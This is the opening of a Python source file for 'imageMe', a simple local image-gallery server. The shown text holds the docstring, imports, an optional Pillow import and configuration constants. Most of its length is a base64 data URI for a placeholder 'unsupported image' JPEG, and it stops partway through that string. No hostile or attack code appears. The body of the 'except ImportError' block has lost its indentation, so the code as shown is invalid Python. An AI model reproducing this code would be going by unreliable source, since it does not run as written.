imageme.py
#!/usr/bin/env python3
"""
imageMe is a super simple image gallery server.
Run imageme.py from the top level of an image directory to generate gallery
index HTML and serve the gallery over HTTP on localhost.
Imported as a module, use imageme.serve_dir(your_path) to do the same for any
directory programmatically. When run as the entry point, imageme.serve_dir('.')
is called.
"""
# Dependencies
import base64, io, os, re, sys, threading
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler
import socketserver
import argparse
# Attempt to import PIL - if it doesn't exist we won't be able to make use of
# some performance enhancing goodness, but imageMe will still work fine
PIL_ENABLED = False
try:
    print('Attempting to import from PIL...')
    from PIL import Image
    PIL_ENABLED = True
    print('Success! Enjoy your supercharged imageMe.')
except ImportError:
print(
'WARNING: \'PIL\' module not found, so you won\'t get all the ' + \
'performance you could out of imageMe. Install Pillow (' + \
'https://github.com/python-pillow/Pillow) to enable support.'
)
# Constants / configuration
## Filename of the generated index files
INDEX_FILE_NAME = 'imageme.html'
## Regex for matching only image files
IMAGE_FILE_REGEX = r'^.+\.(png|jpg|jpeg|tif|tiff|gif|bmp)$'
## Images per row of the gallery tables
IMAGES_PER_ROW = 3
## Resampling mode to use when thumbnailing
RESAMPLE = None if not PIL_ENABLED else Image.NEAREST
## Width in pixels of thumbnails generated with PIL
THUMBNAIL_WIDTH = 800
## Port on which to serve the gallery
PORT = 8000
## Base64 data for an image notifying user of an unsupported image type
UNSUPPORTED_IMAGE_TYPE_DATA = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAMgAyADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD36iiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKK
KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKK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